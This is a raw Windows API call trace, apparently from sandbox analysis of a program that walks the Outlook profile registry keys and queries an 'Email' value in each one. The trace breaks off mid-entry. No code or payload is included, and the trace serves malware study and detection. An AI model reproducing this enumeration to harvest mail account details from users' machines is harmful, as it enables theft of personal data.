[0315.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.126] RegCloseKey (hKey=0x210) returned 0x0 [0315.126] GetProcessHeap () returned 0x780000 [0315.126] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b450 | out: hHeap=0x780000) returned 1 [0315.127] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.127] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x3, pszName=0x79b910, pcchName=0x19fb7c | out: pszName="3517490d76624c419a828607e2a54604", pcchName=0x19fb7c) returned 0x0 [0315.127] GetProcessHeap () returned 0x780000 [0315.127] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b3f0 [0315.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.128] RegOpenKeyW (in: hKey=0x218, lpSubKey="3517490d76624c419a828607e2a54604", phkResult=0x79b3f0 | out: phkResult=0x79b3f0*=0x210) returned 0x0 [0315.128] GetProcessHeap () returned 0x780000 [0315.128] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0315.129] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.129] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208) returned 0x2 [0315.129] GetProcessHeap () returned 0x780000 [0315.129] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.129] GetProcessHeap () returned 0x780000 [0315.129] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79bd28 [0315.130] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.131] wvsprintfW (in: param_1=0x79bd28, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604") returned 88 [0315.131] GetProcessHeap () returned 0x780000 [0315.131] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xb4) returned 0x79a2e8 [0315.131] GetProcessHeap () returned 0x780000 [0315.131] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.131] GetProcessHeap () returned 0x780000 [0315.131] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b410 [0315.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.133] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", phkResult=0x79b410 | out: phkResult=0x79b410*=0x204) returned 0x0 [0315.133] GetProcessHeap () returned 0x780000 [0315.133] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0315.133] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.134] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x79bd28, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0315.134] GetProcessHeap () returned 0x780000 [0315.134] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.135] RegCloseKey (hKey=0x204) returned 0x0 [0315.135] GetProcessHeap () returned 0x780000 [0315.135] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b410 | out: hHeap=0x780000) returned 1 [0315.135] GetProcessHeap () returned 0x780000 [0315.136] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0315.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.138] RegCloseKey (hKey=0x210) returned 0x0 [0315.138] GetProcessHeap () returned 0x780000 [0315.138] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b3f0 | out: hHeap=0x780000) returned 1 [0315.139] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.139] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x4, pszName=0x79b910, pcchName=0x19fb7c | out: pszName="6c29d51f56390b45a924b3b787013a66", pcchName=0x19fb7c) returned 0x0 [0315.140] GetProcessHeap () returned 0x780000 [0315.140] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b350 [0315.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.141] RegOpenKeyW (in: hKey=0x218, lpSubKey="6c29d51f56390b45a924b3b787013a66", phkResult=0x79b350 | out: phkResult=0x79b350*=0x210) returned 0x0 [0315.141] GetProcessHeap () returned 0x780000 [0315.141] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0315.142] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.142] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208) returned 0x2 [0315.142] GetProcessHeap () returned 0x780000 [0315.142] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.142] GetProcessHeap () returned 0x780000 [0315.143] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79bd28 [0315.143] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.144] wvsprintfW (in: param_1=0x79bd28, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\6c29d51f56390b45a924b3b787013a66") returned 88 [0315.144] GetProcessHeap () returned 0x780000 [0315.144] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xb4) returned 0x79a2e8 [0315.144] GetProcessHeap () returned 0x780000 [0315.144] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.144] GetProcessHeap () returned 0x780000 [0315.144] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b3b0 [0315.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.145] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\6c29d51f56390b45a924b3b787013a66", phkResult=0x79b3b0 | out: phkResult=0x79b3b0*=0x204) returned 0x0 [0315.145] GetProcessHeap () returned 0x780000 [0315.145] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0315.146] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.146] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x79bd28, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0315.146] GetProcessHeap () returned 0x780000 [0315.146] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.147] RegCloseKey (hKey=0x204) returned 0x0 [0315.148] GetProcessHeap () returned 0x780000 [0315.148] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b3b0 | out: hHeap=0x780000) returned 1 [0315.148] GetProcessHeap () returned 0x780000 [0315.148] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0315.148] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.149] RegCloseKey (hKey=0x210) returned 0x0 [0315.149] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b350 | out: hHeap=0x780000) returned 1 [0315.149] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.150] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x5, pszName=0x79b910, pcchName=0x19fb7c | out: pszName="8503020000000000c000000000000046", pcchName=0x19fb7c) returned 0x0 [0315.150] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b420 [0315.150] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.151] RegOpenKeyW (in: hKey=0x218, lpSubKey="8503020000000000c000000000000046", phkResult=0x79b420 | out: phkResult=0x79b420*=0x210) returned 0x0 [0315.151] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0315.152] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.152] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208) returned 0x2 [0315.152] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.152] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79bd28 [0315.153] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.154] wvsprintfW (in: param_1=0x79bd28, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046") returned 88 [0315.154] GetProcessHeap () returned 0x780000 [0315.154] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xb4) returned 0x79a2e8 [0315.154] GetProcessHeap () returned 0x780000 [0315.154] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.154] GetProcessHeap () returned 0x780000 [0315.154] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b510 [0315.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.155] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", phkResult=0x79b510 | out: phkResult=0x79b510*=0x204) returned 0x0 [0315.155] GetProcessHeap () returned 0x780000 [0315.155] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0315.156] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.156] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x79bd28, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0315.156] GetProcessHeap () returned 0x780000 [0315.156] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.157] RegCloseKey (hKey=0x204) returned 0x0 [0315.158] GetProcessHeap () returned 0x780000 [0315.158] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b510 | out: hHeap=0x780000) returned 1 [0315.158] GetProcessHeap () returned 0x780000 [0315.158] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0315.158] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.159] RegCloseKey (hKey=0x210) returned 0x0 [0315.159] GetProcessHeap () returned 0x780000 [0315.159] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b420 | out: hHeap=0x780000) returned 1 [0315.159] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.160] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x6, pszName=0x79b910, pcchName=0x19fb7c | out: pszName="8763203907727d498bce4b981b157d7b", pcchName=0x19fb7c) returned 0x0 [0315.160] GetProcessHeap () returned 0x780000 [0315.160] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b340 [0315.160] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.161] RegOpenKeyW (in: hKey=0x218, lpSubKey="8763203907727d498bce4b981b157d7b", phkResult=0x79b340 | out: phkResult=0x79b340*=0x210) returned 0x0 [0315.161] GetProcessHeap () returned 0x780000 [0315.161] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0315.161] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.162] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208) returned 0x2 [0315.162] GetProcessHeap () returned 0x780000 [0315.162] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.162] GetProcessHeap () returned 0x780000 [0315.162] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79bd28 [0315.162] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.163] wvsprintfW (in: param_1=0x79bd28, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8763203907727d498bce4b981b157d7b") returned 88 [0315.163] GetProcessHeap () returned 0x780000 [0315.163] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xb4) returned 0x79a2e8 [0315.163] GetProcessHeap () returned 0x780000 [0315.163] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.163] GetProcessHeap () returned 0x780000 [0315.163] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b390 [0315.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.164] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8763203907727d498bce4b981b157d7b", phkResult=0x79b390 | out: phkResult=0x79b390*=0x204) returned 0x0 [0315.165] GetProcessHeap () returned 0x780000 [0315.165] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0315.165] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.165] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x79bd28, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0315.165] GetProcessHeap () returned 0x780000 [0315.166] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.166] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.167] RegCloseKey (hKey=0x204) returned 0x0 [0315.167] GetProcessHeap () returned 0x780000 [0315.167] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b390 | out: hHeap=0x780000) returned 1 [0315.171] GetProcessHeap () returned 0x780000 [0315.171] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0315.171] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.172] RegCloseKey (hKey=0x210) returned 0x0 [0315.172] GetProcessHeap () returned 0x780000 [0315.172] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b340 | out: hHeap=0x780000) returned 1 [0315.173] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.173] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x7, pszName=0x79b910, pcchName=0x19fb7c | out: pszName="893893ade607c44aa338ac7df5d6cb42", pcchName=0x19fb7c) returned 0x0 [0315.173] GetProcessHeap () returned 0x780000 [0315.173] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b3d0 [0315.173] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.174] RegOpenKeyW (in: hKey=0x218, lpSubKey="893893ade607c44aa338ac7df5d6cb42", phkResult=0x79b3d0 | out: phkResult=0x79b3d0*=0x210) returned 0x0 [0315.174] GetProcessHeap () returned 0x780000 [0315.174] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0315.175] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.175] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208) returned 0x2 [0315.175] GetProcessHeap () returned 0x780000 [0315.175] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.175] GetProcessHeap () returned 0x780000 [0315.175] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79bd28 [0315.176] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.176] wvsprintfW (in: param_1=0x79bd28, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\893893ade607c44aa338ac7df5d6cb42") returned 88 [0315.176] GetProcessHeap () returned 0x780000 [0315.176] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xb4) returned 0x79a2e8 [0315.176] GetProcessHeap () returned 0x780000 [0315.177] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.177] GetProcessHeap () returned 0x780000 [0315.177] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b3e0 [0315.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.178] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\893893ade607c44aa338ac7df5d6cb42", phkResult=0x79b3e0 | out: phkResult=0x79b3e0*=0x204) returned 0x0 [0315.178] GetProcessHeap () returned 0x780000 [0315.178] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0315.179] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.179] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x79bd28, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0315.179] GetProcessHeap () returned 0x780000 [0315.179] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.180] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.180] RegCloseKey (hKey=0x204) returned 0x0 [0315.180] GetProcessHeap () returned 0x780000 [0315.180] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b3e0 | out: hHeap=0x780000) returned 1 [0315.180] GetProcessHeap () returned 0x780000 [0315.180] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0315.181] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.181] RegCloseKey (hKey=0x210) returned 0x0 [0315.181] GetProcessHeap () returned 0x780000 [0315.181] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b3d0 | out: hHeap=0x780000) returned 1 [0315.182] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.182] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x8, pszName=0x79b910, pcchName=0x19fb7c | out: pszName="9207f3e0a3b11019908b08002b2a56c2", pcchName=0x19fb7c) returned 0x0 [0315.182] GetProcessHeap () returned 0x780000 [0315.182] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b4e0 [0315.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.184] RegOpenKeyW (in: hKey=0x218, lpSubKey="9207f3e0a3b11019908b08002b2a56c2", phkResult=0x79b4e0 | out: phkResult=0x79b4e0*=0x210) returned 0x0 [0315.184] GetProcessHeap () returned 0x780000 [0315.184] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0315.184] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.185] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208) returned 0x2 [0315.185] GetProcessHeap () returned 0x780000 [0315.185] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.185] GetProcessHeap () returned 0x780000 [0315.185] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79bd28 [0315.186] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.186] wvsprintfW (in: param_1=0x79bd28, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2") returned 88 [0315.186] GetProcessHeap () returned 0x780000 [0315.186] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xb4) returned 0x79a2e8 [0315.186] GetProcessHeap () returned 0x780000 [0315.186] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.187] GetProcessHeap () returned 0x780000 [0315.187] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b480 [0315.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.188] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", phkResult=0x79b480 | out: phkResult=0x79b480*=0x204) returned 0x0 [0315.188] GetProcessHeap () returned 0x780000 [0315.188] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0315.188] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.188] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x79bd28, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0315.189] GetProcessHeap () returned 0x780000 [0315.189] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.190] RegCloseKey (hKey=0x204) returned 0x0 [0315.190] GetProcessHeap () returned 0x780000 [0315.190] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b480 | out: hHeap=0x780000) returned 1 [0315.190] GetProcessHeap () returned 0x780000 [0315.190] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0315.191] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.191] RegCloseKey (hKey=0x210) returned 0x0 [0315.191] GetProcessHeap () returned 0x780000 [0315.191] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b4e0 | out: hHeap=0x780000) returned 1 [0315.192] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.192] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x9, pszName=0x79b910, pcchName=0x19fb7c | out: pszName="9375CFF0413111d3B88A00104B2A6676", pcchName=0x19fb7c) returned 0x0 [0315.192] GetProcessHeap () returned 0x780000 [0315.192] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b470 [0315.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.193] RegOpenKeyW (in: hKey=0x218, lpSubKey="9375CFF0413111d3B88A00104B2A6676", phkResult=0x79b470 | out: phkResult=0x79b470*=0x210) returned 0x0 [0315.193] GetProcessHeap () returned 0x780000 [0315.193] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0315.194] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.194] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x79bd28, pcbData=0x19f6f0*=0x208) returned 0x2 [0315.194] GetProcessHeap () returned 0x780000 [0315.194] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.194] GetProcessHeap () returned 0x780000 [0315.194] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79bd28 [0315.195] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.195] wvsprintfW (in: param_1=0x79bd28, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned 88 [0315.195] GetProcessHeap () returned 0x780000 [0315.195] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xb4) returned 0x79a2e8 [0315.195] GetProcessHeap () returned 0x780000 [0315.196] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79bd28 | out: hHeap=0x780000) returned 1 [0315.196] GetProcessHeap () returned 0x780000 [0315.196] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b410 [0315.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.197] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", phkResult=0x79b410 | out: phkResult=0x79b410*=0x204) returned 0x0 [0315.197] GetProcessHeap () returned 0x780000 [0315.197] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79bd28 [0315.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.198] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x79bd28, pcchName=0x19fb4c | out: pszName="00000001", pcchName=0x19fb4c) returned 0x0 [0315.198] GetProcessHeap () returned 0x780000 [0315.198] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b490 [0315.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.199] RegOpenKeyW (in: hKey=0x204, lpSubKey="00000001", phkResult=0x79b490 | out: phkResult=0x79b490*=0x21c) returned 0x0 [0315.199] GetProcessHeap () returned 0x780000 [0315.199] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79c140 [0315.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.200] SHQueryValueExW (in: hkey=0x21c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x79c140, pcbData=0x19f6c0*=0x208 | out: pdwType=0x0, pvData=0x79c140, pcbData=0x19f6c0*=0x208) returned 0x2 [0315.200] GetProcessHeap () returned 0x780000 [0315.200] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c140 | out: hHeap=0x780000) returned 1 [0315.201] GetProcessHeap () returned 0x780000 [0315.201] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79c140 [0315.201] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.202] wvsprintfW (in: param_1=0x79c140, param_2="%s\\%s", arglist=0x19fb30 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001") returned 97 [0315.202] GetProcessHeap () returned 0x780000 [0315.202] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc6) returned 0x78e498 [0315.202] GetProcessHeap () returned 0x780000 [0315.202] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c140 | out: hHeap=0x780000) returned 1 [0315.203] GetProcessHeap () returned 0x780000 [0315.203] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b500 [0315.204] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", phkResult=0x79b500 | out: phkResult=0x79b500*=0x220) returned 0x0 [0315.204] GetProcessHeap () returned 0x780000 [0315.204] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79c140 [0315.205] SHEnumKeyExW (in: hkey=0x220, dwIndex=0x0, pszName=0x79c140, pcchName=0x19fb1c | out: pszName="", pcchName=0x19fb1c) returned 0x103 [0315.205] GetProcessHeap () returned 